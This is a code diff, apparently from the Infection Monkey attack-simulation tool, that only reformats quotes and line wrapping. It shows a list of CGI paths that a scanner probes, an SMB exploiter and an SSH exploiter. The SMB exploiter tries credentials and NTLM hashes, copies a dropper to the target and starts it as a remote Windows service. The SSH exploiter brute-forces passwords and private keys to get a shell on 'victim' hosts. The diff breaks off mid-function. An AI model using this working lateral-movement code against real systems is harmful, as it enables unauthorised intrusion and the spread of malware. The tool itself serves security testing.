r"/cgi-bin/way-board.cgi",
|
||||||
r'/cgi-bin/way-board/way-board.cgi',
|
r"/cgi-bin/way-board/way-board.cgi",
|
||||||
r'/cgi-bin/webbbs.cgi',
|
r"/cgi-bin/webbbs.cgi",
|
||||||
r'/cgi-bin/webcart/webcart.cgi',
|
r"/cgi-bin/webcart/webcart.cgi",
|
||||||
r'/cgi-bin/webdist.cgi',
|
r"/cgi-bin/webdist.cgi",
|
||||||
r'/cgi-bin/webif.cgi',
|
r"/cgi-bin/webif.cgi",
|
||||||
r'/cgi-bin/webmail/html/emumail.cgi',
|
r"/cgi-bin/webmail/html/emumail.cgi",
|
||||||
r'/cgi-bin/webmap.cgi',
|
r"/cgi-bin/webmap.cgi",
|
||||||
r'/cgi-bin/webspirs.cgi',
|
r"/cgi-bin/webspirs.cgi",
|
||||||
r'/cgi-bin/Web_Store/web_store.cgi',
|
r"/cgi-bin/Web_Store/web_store.cgi",
|
||||||
r'/cgi-bin/whois.cgi',
|
r"/cgi-bin/whois.cgi",
|
||||||
r'/cgi-bin/whois_raw.cgi',
|
r"/cgi-bin/whois_raw.cgi",
|
||||||
r'/cgi-bin/whois/whois.cgi',
|
r"/cgi-bin/whois/whois.cgi",
|
||||||
r'/cgi-bin/wrap',
|
r"/cgi-bin/wrap",
|
||||||
r'/cgi-bin/wrap.cgi',
|
r"/cgi-bin/wrap.cgi",
|
||||||
r'/cgi-bin/wwwboard.cgi.cgi',
|
r"/cgi-bin/wwwboard.cgi.cgi",
|
||||||
r'/cgi-bin/YaBB/YaBB.cgi',
|
r"/cgi-bin/YaBB/YaBB.cgi",
|
||||||
r'/cgi-bin/zml.cgi',
|
r"/cgi-bin/zml.cgi",
|
||||||
r'/cgi-mod/index.cgi',
|
r"/cgi-mod/index.cgi",
|
||||||
r'/cgis/wwwboard/wwwboard.cgi',
|
r"/cgis/wwwboard/wwwboard.cgi",
|
||||||
r'/cgi-sys/addalink.cgi',
|
r"/cgi-sys/addalink.cgi",
|
||||||
r'/cgi-sys/defaultwebpage.cgi',
|
r"/cgi-sys/defaultwebpage.cgi",
|
||||||
r'/cgi-sys/domainredirect.cgi',
|
r"/cgi-sys/domainredirect.cgi",
|
||||||
r'/cgi-sys/entropybanner.cgi',
|
r"/cgi-sys/entropybanner.cgi",
|
||||||
r'/cgi-sys/entropysearch.cgi',
|
r"/cgi-sys/entropysearch.cgi",
|
||||||
r'/cgi-sys/FormMail-clone.cgi',
|
r"/cgi-sys/FormMail-clone.cgi",
|
||||||
r'/cgi-sys/helpdesk.cgi',
|
r"/cgi-sys/helpdesk.cgi",
|
||||||
r'/cgi-sys/mchat.cgi',
|
r"/cgi-sys/mchat.cgi",
|
||||||
r'/cgi-sys/randhtml.cgi',
|
r"/cgi-sys/randhtml.cgi",
|
||||||
r'/cgi-sys/realhelpdesk.cgi',
|
r"/cgi-sys/realhelpdesk.cgi",
|
||||||
r'/cgi-sys/realsignup.cgi',
|
r"/cgi-sys/realsignup.cgi",
|
||||||
r'/cgi-sys/signup.cgi',
|
r"/cgi-sys/signup.cgi",
|
||||||
r'/connector.cgi',
|
r"/connector.cgi",
|
||||||
r'/cp/rac/nsManager.cgi',
|
r"/cp/rac/nsManager.cgi",
|
||||||
r'/create_release.sh',
|
r"/create_release.sh",
|
||||||
r'/CSNews.cgi',
|
r"/CSNews.cgi",
|
||||||
r'/csPassword.cgi',
|
r"/csPassword.cgi",
|
||||||
r'/dcadmin.cgi',
|
r"/dcadmin.cgi",
|
||||||
r'/dcboard.cgi',
|
r"/dcboard.cgi",
|
||||||
r'/dcforum.cgi',
|
r"/dcforum.cgi",
|
||||||
r'/dcforum/dcforum.cgi',
|
r"/dcforum/dcforum.cgi",
|
||||||
r'/debuff.cgi',
|
r"/debuff.cgi",
|
||||||
r'/debug.cgi',
|
r"/debug.cgi",
|
||||||
r'/details.cgi',
|
r"/details.cgi",
|
||||||
r'/edittag/edittag.cgi',
|
r"/edittag/edittag.cgi",
|
||||||
r'/emumail.cgi',
|
r"/emumail.cgi",
|
||||||
r'/enter_buff.cgi',
|
r"/enter_buff.cgi",
|
||||||
r'/enter_bug.cgi',
|
r"/enter_bug.cgi",
|
||||||
r'/ez2000/ezadmin.cgi',
|
r"/ez2000/ezadmin.cgi",
|
||||||
r'/ez2000/ezboard.cgi',
|
r"/ez2000/ezboard.cgi",
|
||||||
r'/ez2000/ezman.cgi',
|
r"/ez2000/ezman.cgi",
|
||||||
r'/fcgi-bin/echo',
|
r"/fcgi-bin/echo",
|
||||||
r'/fcgi-bin/echo',
|
r"/fcgi-bin/echo",
|
||||||
r'/fcgi-bin/echo2',
|
r"/fcgi-bin/echo2",
|
||||||
r'/fcgi-bin/echo2',
|
r"/fcgi-bin/echo2",
|
||||||
r'/Gozila.cgi',
|
r"/Gozila.cgi",
|
||||||
r'/hitmatic/analyse.cgi',
|
r"/hitmatic/analyse.cgi",
|
||||||
r'/hp_docs/cgi-bin/index.cgi',
|
r"/hp_docs/cgi-bin/index.cgi",
|
||||||
r'/html/cgi-bin/cgicso',
|
r"/html/cgi-bin/cgicso",
|
||||||
r'/html/cgi-bin/cgicso',
|
r"/html/cgi-bin/cgicso",
|
||||||
r'/index.cgi',
|
r"/index.cgi",
|
||||||
r'/info.cgi',
|
r"/info.cgi",
|
||||||
r'/infosrch.cgi',
|
r"/infosrch.cgi",
|
||||||
r'/login.cgi',
|
r"/login.cgi",
|
||||||
r'/mailview.cgi',
|
r"/mailview.cgi",
|
||||||
r'/main.cgi',
|
r"/main.cgi",
|
||||||
r'/megabook/admin.cgi',
|
r"/megabook/admin.cgi",
|
||||||
r'/ministats/admin.cgi',
|
r"/ministats/admin.cgi",
|
||||||
r'/mods/apage/apage.cgi',
|
r"/mods/apage/apage.cgi",
|
||||||
r'/_mt/mt.cgi',
|
r"/_mt/mt.cgi",
|
||||||
r'/musicqueue.cgi',
|
r"/musicqueue.cgi",
|
||||||
r'/ncbook.cgi',
|
r"/ncbook.cgi",
|
||||||
r'/newpro.cgi',
|
r"/newpro.cgi",
|
||||||
r'/newsletter.sh',
|
r"/newsletter.sh",
|
||||||
r'/oem_webstage/cgi-bin/oemapp_cgi',
|
r"/oem_webstage/cgi-bin/oemapp_cgi",
|
||||||
r'/page.cgi',
|
r"/page.cgi",
|
||||||
r'/parse_xml.cgi',
|
r"/parse_xml.cgi",
|
||||||
r'/photodata/manage.cgi',
|
r"/photodata/manage.cgi",
|
||||||
r'/photo/manage.cgi',
|
r"/photo/manage.cgi",
|
||||||
r'/print.cgi',
|
r"/print.cgi",
|
||||||
r'/process_buff.cgi',
|
r"/process_buff.cgi",
|
||||||
r'/process_bug.cgi',
|
r"/process_bug.cgi",
|
||||||
r'/pub/english.cgi',
|
r"/pub/english.cgi",
|
||||||
r'/quikmail/nph-emumail.cgi',
|
r"/quikmail/nph-emumail.cgi",
|
||||||
r'/quikstore.cgi',
|
r"/quikstore.cgi",
|
||||||
r'/reviews/newpro.cgi',
|
r"/reviews/newpro.cgi",
|
||||||
r'/ROADS/cgi-bin/search.pl',
|
r"/ROADS/cgi-bin/search.pl",
|
||||||
r'/sample01.cgi',
|
r"/sample01.cgi",
|
||||||
r'/sample02.cgi',
|
r"/sample02.cgi",
|
||||||
r'/sample03.cgi',
|
r"/sample03.cgi",
|
||||||
r'/sample04.cgi',
|
r"/sample04.cgi",
|
||||||
r'/sampleposteddata.cgi',
|
r"/sampleposteddata.cgi",
|
||||||
r'/scancfg.cgi',
|
r"/scancfg.cgi",
|
||||||
r'/scancfg.cgi',
|
r"/scancfg.cgi",
|
||||||
r'/servers/link.cgi',
|
r"/servers/link.cgi",
|
||||||
r'/setpasswd.cgi',
|
r"/setpasswd.cgi",
|
||||||
r'/SetSecurity.shm',
|
r"/SetSecurity.shm",
|
||||||
r'/shop/member_html.cgi',
|
r"/shop/member_html.cgi",
|
||||||
r'/shop/normal_html.cgi',
|
r"/shop/normal_html.cgi",
|
||||||
r'/site_searcher.cgi',
|
r"/site_searcher.cgi",
|
||||||
r'/siteUserMod.cgi',
|
r"/siteUserMod.cgi",
|
||||||
r'/submit.cgi',
|
r"/submit.cgi",
|
||||||
r'/technote/print.cgi',
|
r"/technote/print.cgi",
|
||||||
r'/template.cgi',
|
r"/template.cgi",
|
||||||
r'/test.cgi',
|
r"/test.cgi",
|
||||||
r'/ucsm/isSamInstalled.cgi',
|
r"/ucsm/isSamInstalled.cgi",
|
||||||
r'/upload.cgi',
|
r"/upload.cgi",
|
||||||
r'/userreg.cgi',
|
r"/userreg.cgi",
|
||||||
r'/users/scripts/submit.cgi',
|
r"/users/scripts/submit.cgi",
|
||||||
r'/vood/cgi-bin/vood_view.cgi',
|
r"/vood/cgi-bin/vood_view.cgi",
|
||||||
r'/Web_Store/web_store.cgi',
|
r"/Web_Store/web_store.cgi",
|
||||||
r'/webtools/bonsai/ccvsblame.cgi',
|
r"/webtools/bonsai/ccvsblame.cgi",
|
||||||
r'/webtools/bonsai/cvsblame.cgi',
|
r"/webtools/bonsai/cvsblame.cgi",
|
||||||
r'/webtools/bonsai/cvslog.cgi',
|
r"/webtools/bonsai/cvslog.cgi",
|
||||||
r'/webtools/bonsai/cvsquery.cgi',
|
r"/webtools/bonsai/cvsquery.cgi",
|
||||||
r'/webtools/bonsai/cvsqueryform.cgi',
|
r"/webtools/bonsai/cvsqueryform.cgi",
|
||||||
r'/webtools/bonsai/showcheckins.cgi',
|
r"/webtools/bonsai/showcheckins.cgi",
|
||||||
r'/wwwadmin.cgi',
|
r"/wwwadmin.cgi",
|
||||||
r'/wwwboard.cgi',
|
r"/wwwboard.cgi",
|
||||||
r'/wwwboard/wwwboard.cgi'
|
r"/wwwboard/wwwboard.cgi",
|
||||||
)
|
)
|
||||||
|
|
|
@ -5,10 +5,13 @@ from impacket.dcerpc.v5 import scmr, transport
|
||||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import (
|
||||||
|
build_monkey_commandline,
|
||||||
|
get_monkey_depth,
|
||||||
|
get_target_monkey,
|
||||||
|
)
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||||
from infection_monkey.model import (DROPPER_CMDLINE_DETACHED_WINDOWS,
|
from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
|
||||||
MONKEY_CMDLINE_DETACHED_WINDOWS)
|
|
||||||
from infection_monkey.network.smbfinger import SMBFinger
|
from infection_monkey.network.smbfinger import SMBFinger
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
|
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
|
||||||
|
@ -17,12 +20,12 @@ LOG = getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class SmbExploiter(HostExploiter):
|
class SmbExploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ["windows"]
|
||||||
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
_EXPLOITED_SERVICE = 'SMB'
|
_EXPLOITED_SERVICE = "SMB"
|
||||||
KNOWN_PROTOCOLS = {
|
KNOWN_PROTOCOLS = {
|
||||||
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
|
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
|
||||||
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
|
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
|
||||||
}
|
}
|
||||||
USE_KERBEROS = False
|
USE_KERBEROS = False
|
||||||
|
|
||||||
|
@ -34,7 +37,7 @@ class SmbExploiter(HostExploiter):
|
||||||
if super(SmbExploiter, self).is_os_supported():
|
if super(SmbExploiter, self).is_os_supported():
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if not self.host.os.get('type'):
|
if not self.host.os.get("type"):
|
||||||
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
|
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
|
||||||
if is_smb_open:
|
if is_smb_open:
|
||||||
smb_finger = SMBFinger()
|
smb_finger = SMBFinger()
|
||||||
|
@ -42,8 +45,8 @@ class SmbExploiter(HostExploiter):
|
||||||
else:
|
else:
|
||||||
is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139)
|
is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139)
|
||||||
if is_nb_open:
|
if is_nb_open:
|
||||||
self.host.os['type'] = 'windows'
|
self.host.os["type"] = "windows"
|
||||||
return self.host.os.get('type') in self._TARGET_OS_TYPE
|
return self.host.os.get("type") in self._TARGET_OS_TYPE
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
|
@ -59,25 +62,34 @@ class SmbExploiter(HostExploiter):
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
try:
|
try:
|
||||||
# copy the file remotely using SMB
|
# copy the file remotely using SMB
|
||||||
remote_full_path = SmbTools.copy_file(self.host,
|
remote_full_path = SmbTools.copy_file(
|
||||||
src_path,
|
self.host,
|
||||||
self._config.dropper_target_path_win_32,
|
src_path,
|
||||||
user,
|
self._config.dropper_target_path_win_32,
|
||||||
password,
|
user,
|
||||||
lm_hash,
|
password,
|
||||||
ntlm_hash,
|
lm_hash,
|
||||||
self._config.smb_download_timeout)
|
ntlm_hash,
|
||||||
|
self._config.smb_download_timeout,
|
||||||
|
)
|
||||||
|
|
||||||
if remote_full_path is not None:
|
if remote_full_path is not None:
|
||||||
LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
|
LOG.debug(
|
||||||
self.host,
|
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
|
||||||
user,
|
self.host,
|
||||||
self._config.hash_sensitive_data(password),
|
user,
|
||||||
self._config.hash_sensitive_data(lm_hash),
|
self._config.hash_sensitive_data(password),
|
||||||
self._config.hash_sensitive_data(ntlm_hash))
|
self._config.hash_sensitive_data(lm_hash),
|
||||||
|
self._config.hash_sensitive_data(ntlm_hash),
|
||||||
|
)
|
||||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||||
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
|
self.add_vuln_port(
|
||||||
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
|
"%s or %s"
|
||||||
|
% (
|
||||||
|
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
|
||||||
|
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
|
||||||
|
)
|
||||||
|
)
|
||||||
exploited = True
|
exploited = True
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
|
@ -93,7 +105,8 @@ class SmbExploiter(HostExploiter):
|
||||||
self._config.hash_sensitive_data(password),
|
self._config.hash_sensitive_data(password),
|
||||||
self._config.hash_sensitive_data(lm_hash),
|
self._config.hash_sensitive_data(lm_hash),
|
||||||
self._config.hash_sensitive_data(ntlm_hash),
|
self._config.hash_sensitive_data(ntlm_hash),
|
||||||
exc)
|
exc,
|
||||||
|
)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if not exploited:
|
if not exploited:
|
||||||
|
@ -103,24 +116,29 @@ class SmbExploiter(HostExploiter):
|
||||||
self.set_vulnerable_port()
|
self.set_vulnerable_port()
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
|
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
|
||||||
build_monkey_commandline(self.host, get_monkey_depth() - 1,
|
"dropper_path": remote_full_path
|
||||||
self.vulnerable_port,
|
} + build_monkey_commandline(
|
||||||
self._config.dropper_target_path_win_32)
|
self.host,
|
||||||
|
get_monkey_depth() - 1,
|
||||||
|
self.vulnerable_port,
|
||||||
|
self._config.dropper_target_path_win_32,
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
|
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
|
||||||
build_monkey_commandline(self.host,
|
"monkey_path": remote_full_path
|
||||||
get_monkey_depth() - 1,
|
} + build_monkey_commandline(
|
||||||
vulnerable_port=self.vulnerable_port)
|
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
|
||||||
|
)
|
||||||
|
|
||||||
smb_conn = False
|
smb_conn = False
|
||||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||||
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
|
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
|
||||||
rpctransport.set_dport(port)
|
rpctransport.set_dport(port)
|
||||||
rpctransport.setRemoteHost(self.host.ip_addr)
|
rpctransport.setRemoteHost(self.host.ip_addr)
|
||||||
if hasattr(rpctransport, 'set_credentials'):
|
if hasattr(rpctransport, "set_credentials"):
|
||||||
# This method exists only for selected protocol sequences.
|
# This method exists only for selected protocol sequences.
|
||||||
rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
|
rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None)
|
||||||
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
|
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
|
||||||
|
|
||||||
scmr_rpc = rpctransport.get_dce_rpc()
|
scmr_rpc = rpctransport.get_dce_rpc()
|
||||||
|
@ -128,7 +146,12 @@ class SmbExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
scmr_rpc.connect()
|
scmr_rpc.connect()
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
|
LOG.debug(
|
||||||
|
"Can't connect to SCM on exploited machine %r port %s : %s",
|
||||||
|
self.host,
|
||||||
|
port,
|
||||||
|
exc,
|
||||||
|
)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
smb_conn = rpctransport.get_smb_connection()
|
smb_conn = rpctransport.get_smb_connection()
|
||||||
|
@ -140,12 +163,17 @@ class SmbExploiter(HostExploiter):
|
||||||
smb_conn.setTimeout(100000)
|
smb_conn.setTimeout(100000)
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
||||||
sc_handle = resp['lpScHandle']
|
sc_handle = resp["lpScHandle"]
|
||||||
|
|
||||||
# start the monkey using the SCM
|
# start the monkey using the SCM
|
||||||
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
|
resp = scmr.hRCreateServiceW(
|
||||||
lpBinaryPathName=cmdline)
|
scmr_rpc,
|
||||||
service = resp['lpServiceHandle']
|
sc_handle,
|
||||||
|
self._config.smb_service_name,
|
||||||
|
self._config.smb_service_name,
|
||||||
|
lpBinaryPathName=cmdline,
|
||||||
|
)
|
||||||
|
service = resp["lpServiceHandle"]
|
||||||
try:
|
try:
|
||||||
scmr.hRStartServiceW(scmr_rpc, service)
|
scmr.hRStartServiceW(scmr_rpc, service)
|
||||||
status = ScanStatus.USED
|
status = ScanStatus.USED
|
||||||
|
@ -156,17 +184,26 @@ class SmbExploiter(HostExploiter):
|
||||||
scmr.hRDeleteService(scmr_rpc, service)
|
scmr.hRDeleteService(scmr_rpc, service)
|
||||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info(
|
||||||
remote_full_path, self.host, cmdline)
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
remote_full_path,
|
||||||
|
self.host,
|
||||||
|
cmdline,
|
||||||
|
)
|
||||||
|
|
||||||
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
|
self.add_vuln_port(
|
||||||
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
|
"%s or %s"
|
||||||
|
% (
|
||||||
|
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
|
||||||
|
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
|
||||||
|
)
|
||||||
|
)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def set_vulnerable_port(self):
|
def set_vulnerable_port(self):
|
||||||
if 'tcp-445' in self.host.services:
|
if "tcp-445" in self.host.services:
|
||||||
self.vulnerable_port = "445"
|
self.vulnerable_port = "445"
|
||||||
elif 'tcp-139' in self.host.services:
|
elif "tcp-139" in self.host.services:
|
||||||
self.vulnerable_port = "139"
|
self.vulnerable_port = "139"
|
||||||
else:
|
else:
|
||||||
self.vulnerable_port = None
|
self.vulnerable_port = None
|
||||||
|
|
|
@ -9,13 +9,17 @@ from common.utils.attack_utils import ScanStatus
|
||||||
from common.utils.exceptions import FailedExploitationError
|
from common.utils.exceptions import FailedExploitationError
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import (
|
||||||
|
build_monkey_commandline,
|
||||||
|
get_monkey_depth,
|
||||||
|
get_target_monkey,
|
||||||
|
)
|
||||||
from infection_monkey.model import MONKEY_ARG
|
from infection_monkey.model import MONKEY_ARG
|
||||||
from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
|
from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
|
||||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||||
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
|
||||||
|
|
||||||
__author__ = 'hoffer'
|
__author__ = "hoffer"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
SSH_PORT = 22
|
SSH_PORT = 22
|
||||||
|
@ -23,9 +27,9 @@ TRANSFER_UPDATE_RATE = 15
|
||||||
|
|
||||||
|
|
||||||
class SSHExploiter(HostExploiter):
|
class SSHExploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['linux', None]
|
_TARGET_OS_TYPE = ["linux", None]
|
||||||
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
_EXPLOITED_SERVICE = 'SSH'
|
_EXPLOITED_SERVICE = "SSH"
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(SSHExploiter, self).__init__(host)
|
super(SSHExploiter, self).__init__(host)
|
||||||
|
@ -42,29 +46,27 @@ class SSHExploiter(HostExploiter):
|
||||||
|
|
||||||
for user, ssh_key_pair in user_ssh_key_pairs:
|
for user, ssh_key_pair in user_ssh_key_pairs:
|
||||||
# Creating file-like private key for paramiko
|
# Creating file-like private key for paramiko
|
||||||
pkey = io.StringIO(ssh_key_pair['private_key'])
|
pkey = io.StringIO(ssh_key_pair["private_key"])
|
||||||
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
|
ssh_string = "%s@%s" % (ssh_key_pair["user"], ssh_key_pair["ip"])
|
||||||
|
|
||||||
ssh = paramiko.SSHClient()
|
ssh = paramiko.SSHClient()
|
||||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||||
try:
|
try:
|
||||||
pkey = paramiko.RSAKey.from_private_key(pkey)
|
pkey = paramiko.RSAKey.from_private_key(pkey)
|
||||||
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
|
except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
|
||||||
LOG.error("Failed reading ssh key")
|
LOG.error("Failed reading ssh key")
|
||||||
try:
|
try:
|
||||||
ssh.connect(self.host.ip_addr,
|
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
|
||||||
username=user,
|
LOG.debug(
|
||||||
pkey=pkey,
|
"Successfully logged in %s using %s users private key", self.host, ssh_string
|
||||||
port=port)
|
)
|
||||||
LOG.debug("Successfully logged in %s using %s users private key",
|
|
||||||
self.host, ssh_string)
|
|
||||||
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
||||||
return ssh
|
return ssh
|
||||||
except Exception:
|
except Exception:
|
||||||
ssh.close()
|
ssh.close()
|
||||||
LOG.debug("Error logging into victim %r with %s"
|
LOG.debug(
|
||||||
" private key", self.host,
|
"Error logging into victim %r with %s" " private key", self.host, ssh_string
|
||||||
ssh_string)
|
)
|
||||||
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
||||||
continue
|
continue
|
||||||
raise FailedExploitationError
|
raise FailedExploitationError
|
||||||
|
@ -77,21 +79,27 @@ class SSHExploiter(HostExploiter):
|
||||||
ssh = paramiko.SSHClient()
|
ssh = paramiko.SSHClient()
|
||||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||||
try:
|
try:
|
||||||
ssh.connect(self.host.ip_addr,
|
ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)
|
||||||
username=user,
|
|
||||||
password=current_password,
|
|
||||||
port=port)
|
|
||||||
|
|
||||||
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
|
LOG.debug(
|
||||||
self.host, user, self._config.hash_sensitive_data(current_password))
|
"Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
|
||||||
|
self.host,
|
||||||
|
user,
|
||||||
|
self._config.hash_sensitive_data(current_password),
|
||||||
|
)
|
||||||
self.add_vuln_port(port)
|
self.add_vuln_port(port)
|
||||||
self.report_login_attempt(True, user, current_password)
|
self.report_login_attempt(True, user, current_password)
|
||||||
return ssh
|
return ssh
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error logging into victim %r with user"
|
LOG.debug(
|
||||||
" %s and password (SHA-512) '%s': (%s)", self.host,
|
"Error logging into victim %r with user"
|
||||||
user, self._config.hash_sensitive_data(current_password), exc)
|
" %s and password (SHA-512) '%s': (%s)",
|
||||||
|
self.host,
|
||||||
|
user,
|
||||||
|
self._config.hash_sensitive_data(current_password),
|
||||||
|
exc,
|
||||||
|
)
|
||||||
self.report_login_attempt(False, user, current_password)
|
self.report_login_attempt(False, user, current_password)
|
||||||
ssh.close()
|
ssh.close()
|
||||||
continue
|
continue
|
||||||
|
@ -102,8 +110,8 @@ class SSHExploiter(HostExploiter):
|
||||||
port = SSH_PORT
|
port = SSH_PORT
|
||||||
# if ssh banner found on different port, use that port.
|
# if ssh banner found on different port, use that port.
|
||||||
for servkey, servdata in list(self.host.services.items()):
|
for servkey, servdata in list(self.host.services.items()):
|
||||||
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
|
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
|
||||||
port = int(servkey.replace('tcp-', ''))
|
port = int(servkey.replace("tcp-", ""))
|
||||||
|
|
||||||
is_open, _ = check_tcp_port(self.host.ip_addr, port)
|
is_open, _ = check_tcp_port(self.host.ip_addr, port)
|
||||||
if not is_open:
|
if not is_open:
|
||||||
|
@ -119,12 +127,12 @@ class SSHExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter SSHExploiter is giving up...")
|
LOG.debug("Exploiter SSHExploiter is giving up...")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if not self.host.os.get('type'):
|
if not self.host.os.get("type"):
|
||||||
try:
|
try:
|
||||||
_, stdout, _ = ssh.exec_command('uname -o')
|
_, stdout, _ = ssh.exec_command("uname -o")
|
||||||
uname_os = stdout.read().lower().strip().decode()
|
uname_os = stdout.read().lower().strip().decode()
|
||||||
if 'linux' in uname_os:
|
if "linux" in uname_os:
|
||||||
self.host.os['type'] = 'linux'
|
self.host.os["type"] = "linux"
|
||||||
